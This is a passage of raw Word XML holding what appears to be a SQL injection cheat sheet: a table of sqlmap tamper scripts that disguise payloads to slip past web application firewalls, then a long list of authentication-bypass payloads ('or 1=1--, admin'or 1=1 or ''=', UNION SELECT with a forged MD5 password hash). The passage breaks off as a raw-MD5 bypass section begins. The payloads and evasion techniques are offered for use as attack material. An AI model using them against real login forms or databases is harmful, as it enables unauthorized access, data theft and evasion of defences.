              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="24292E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC3B92">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="24292E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="69AC4C36"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DEB328"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0x2char.py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BCFB7"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each (MySQL) 0x encoded string with equivalent CONCAT(CHAR(),…) counterpart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="3A751023"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F49E51"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apostrophemask.py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6A561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apostrophe character with its UTF-8 full width counterpart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="6D98780D"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F8E4A9"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lastRenderedPageBreak/>
              <w:t>apostrophenullencode.py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68E7FB"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apostrophe character with its illegal double unicode counterpart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="6351F154"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426BD5"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appendnullbyte.py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F8D71"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Appends encoded NULL byte character at the end of payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="3E4C283E"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A41614"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base64encode.py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FF30F"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Base64 all characters in a given payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="6AE89560"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B0A94B"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between.py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5B62C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greater than operator ('&gt;') with 'NOT BETWEEN 0 AND #'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="2D57FBE3"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7691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bluecoat.py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47F392"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after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="0AF6FCC7"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66F0C2"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chardoubleencode.py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2F0C48"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Double url-encodes all characters in a given payload (not processing already encoded)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="6A5AFADC"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4C10DF"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charencode.py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3005C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URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -&gt; %53%45%4C%45%43%54)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="74EFF181"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56BA04"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charunicodeencode.py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2AFB19"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Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -&gt; %u0053%u0045%u004C%u0045%u0043%u0054)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="4D921765"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10D2C8"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charunicodeescape.py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73124F"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Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -&gt; \u0053\u0045\u004C\u0045\u0043\u0054)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="44B34133"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86E75"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lastRenderedPageBreak/>
              <w:t>commalesslimit.py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D26682"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instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="7358D747"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D90F4E"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commalessmid.py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2CEBA4"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instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="550A1EF6"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47C3CB"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commentbeforeparentheses.py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2F061C"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Prepends (inline) comment before parentheses (e.g. ( -&gt; /**/()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="4A8E9C76"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52A574"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concat2concatws.py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A1FDB2"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instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="6356FFAD"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153A66"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charencode.py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6E4B99"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Url-encodes all characters in a given payload (not processing already encoded)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="76148975"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9B7A8C"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charunicodeencode.py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B9198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Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="355DBAC3"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EA49A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equaltolike.py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8B17D"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all occurances of operator equal ('=') with operator 'LIKE'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="6A6B8BFD"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D2A71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escapequotes.py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074BF"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Slash escape quotes (' and ")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="555A8F18"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E6697D"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greatest.py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69AE90"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greater than operator ('&gt;') with 'GREATEST' counterpart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="5291DF62"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0822F"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halfversionedmorekeywords.py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FEFF37"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Adds versioned MySQL comment before each keyword</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="57CF3E8B"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339CED"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lastRenderedPageBreak/>
              <w:t>htmlencode.py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80045"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HTML encode (using code points) all non-alphanumeric characters (e.g. ‘ -&gt; ')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="612DDEED"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F2E7E"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ifnull2casewhenisnull.py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C76301"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instances like ‘IFNULL(A, B)’ with ‘CASE WHEN ISNULL(A) THEN (B) ELSE (A) END’ counterpart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="287A2DEC"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CE0177"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ifnull2ifisnull.py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1B0420"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instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="19EB3A6F"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407898"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informationschemacomment.py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5F5276"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Add an inline comment (/**/) to the end of all occurrences of (MySQL) “information_schema” identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="2AFCBF84"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2D655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least.py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5196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greater than operator (‘&gt;’) with ‘LEAST’ counterpart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="58134A14"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BF3C9"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lowercase.py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42EC7"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each keyword character with lower case value (e.g. SELECT -&gt; select)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="0A8E252E"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0DCD89"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modsecurityversioned.py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92ECA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Embraces complete query with versioned comment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="44184BFC"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350D0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modsecurityzeroversioned.py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40E184"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Embraces complete query with zero-versioned comment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="1E340AD3"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27E3E0"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multiplespaces.py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5E06B4"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Adds multiple spaces around SQL keywords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="7BF073B4"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8FF58D"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nonrecursivereplacement.py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C0534"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predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="11F10AA7"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93BC19"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lastRenderedPageBreak/>
              <w:t>overlongutf8.py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A3E0BB"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Converts all characters in a given payload (not processing already encoded)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="5F8E0AB4"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325C4B"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overlongutf8more.py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0B88DC"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Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -&gt; %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="7998F511"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D90B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percentage.py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E61AA5"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Adds a percentage sign ('%') infront of each character</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="070F9B3D"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FE982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plus2concat.py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20815C"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plus operator (‘+’) with (MsSQL) function CONCAT() counterpart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="027F47F3"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C32D87"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plus2fnconcat.py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680FD"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plus operator (‘+’) with (MsSQL) ODBC function {fn CONCAT()} counterpart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="5F8930B5"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F7E72D"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randomcase.py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6CA881"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each keyword character with random case value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="651ADCE4"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1E7369"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randomcomments.py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3E4CF4"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Add random comments to SQL keywords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="61B39377"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91621"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securesphere.py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F2E121"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Appends special crafted string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="0CA50489"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2D2C5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sp_password.py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0A3BCC"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Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="3DBB0EAA"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ABC65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space2comment.py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42DB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comments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="24D9F584"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2E5E48"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lastRenderedPageBreak/>
              <w:t>space2dash.py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3D7C9"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a dash comment ('--') followed by a random string and a new line ('\n')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="648C9CC6"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AC84F8"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space2hash.py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760AE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a pound character ('#') followed by a random string and a new line ('\n')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="4D002411"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6750F1"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space2morehash.py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98EE70"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a pound character ('#') followed by a random string and a new line ('\n')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="36268A84"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747C6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space2mssqlblank.py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D5B8FD"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a random blank character from a valid set of alternate characters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="774C37C9"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9CC42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space2mssqlhash.py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1E73C6"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a pound character ('#') followed by a new line ('\n')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="2D91AA6A"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05177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space2mysqlblank.py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617350"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a random blank character from a valid set of alternate characters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="1D8F1AFA"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4382FE"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space2mysqldash.py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0525FC"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a dash comment ('--') followed by a new line ('\n')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="56E37D99"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0AA7E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space2plus.py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D86D3D"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plus ('+')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="6D88FA02"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563883"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lastRenderedPageBreak/>
              <w:t>space2randomblank.py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C2E2F1"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space character (' ') with a random blank character from a valid set of alternate characters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="0FE0B309"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C235A"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symboliclogical.py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4FAA8"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AND and OR logical operators with their symbolic counterparts (&amp;&amp; and</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="01427990"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4115FE"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unionalltounion.py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F5942D"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UNION ALL SELECT with UNION SELECT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="6B2FCD73"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3E3C7C"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unmagicquotes.py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36392"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quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="173F875B"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E9A6D2"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uppercase.py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B18B72"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Replaces each keyword character with upper case value 'INSERT'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="14FD1ECD"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79F5"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varnish.py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ABAC48"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Append a HTTP header 'X-originating-IP'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="1E861057"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34D61"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versionedkeywords.py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0C50D7"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Encloses each non-function keyword with versioned MySQL comment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="04B955AE"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2D90FB"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versionedmorekeywords.py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1FA994"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Encloses each keyword with versioned MySQL comment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w14:paraId="212E9495" w14:textId="77777777" w:rsidTr="00CC3B9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18AF8E"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xforwardedfor.py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13AF08" w14:textId="77777777" w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w:rsidRDefault="00CC3B92" w:rsidP="00CC3B92">
            <w:pPr>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Append a fake HTTP header 'X-Forwarded-For'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1306E755" w14:textId="77777777" w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w:rsidRDefault="00CC3B92" w:rsidP="00CC3B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C3B92">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Authentication bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE55B2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lastRenderedPageBreak/>
        <w:t>'-'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE5E41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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6D38A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'&amp;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42232BC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p>
    <w:p w14:paraId="5A52FAE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p>
    <w:p w14:paraId="3C6F938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1=1 limit 1 -- -+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7BA3A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"or'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6542BA1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEA4F4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 '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EF92A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''&amp;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDB192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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736064B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5404131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'-||0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5C970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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1B645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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E5A4F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF7650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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EAFB8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C0695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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D96461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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790C84A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7049C46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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59004CB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8B728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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB5766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or true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8CA48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true</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3191086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true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FCB2E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true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306762E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true</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094A8A8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w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x</w:t>
      </w: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x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB1C0A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w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x</w:t>
      </w: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x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D397FF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w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x</w:t>
      </w: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x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EE2B3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w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x</w:t>
      </w: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x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FE02E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w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x</w:t>
      </w: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x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C22AC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 or (("</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="032F62"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"))=(("</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF05D2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2</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like</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2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1233605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p>
    <w:p w14:paraId="5804A18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6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B5BEC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6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B642F50"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lastRenderedPageBreak/>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6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D77B5D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14874E7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 -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DA443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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41788830"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480D83D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'2' LIKE '1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49877FE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2 LIKE 2--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E41E47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2 LIKE 2#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E630C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2 LIKE 2#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EAE94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2 LIKE 2--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5404740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('2' LIKE '2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E3261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('2' LIKE '2'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A388D5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('2' LIKE '2'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5692B4F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553565A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7C8AD15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748F31C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3476954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admin'or 1=1 or ''='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4448F4B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3DE023D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5ACB940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4EFB58E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1B8DF61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3026092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3E3AC7C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700E311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6B7E5AD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696F739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73B3774C"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46F484F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2D9DB00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1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1575D9A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652B937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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C6089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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F453F9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4EA51B1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2F0CDA7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1B258E9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0ADB6F9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admin"or 1=1 or ""="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F55246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lastRenderedPageBreak/>
        <w:t>admin" or 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2061C1B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61510B2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7D24CAA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078038F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5D157D8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1C7E315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3037830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5CAAE57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233196A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406CE2F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2C4B682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admin") or "1"="1"/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E7A53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6A737D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BB05C7" w14:textId="77777777" w:rsidR="00CC3B92" w:rsidRPr="00CC3B92" w:rsidRDefault="00CC3B92" w:rsidP="00CC3B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C3B92">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Authentication Bypass (Raw MD5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D97D5B"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When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AAF2A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w:t>
      </w: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FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> pass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md5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B92">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>($password,</w:t>
      </w:r>
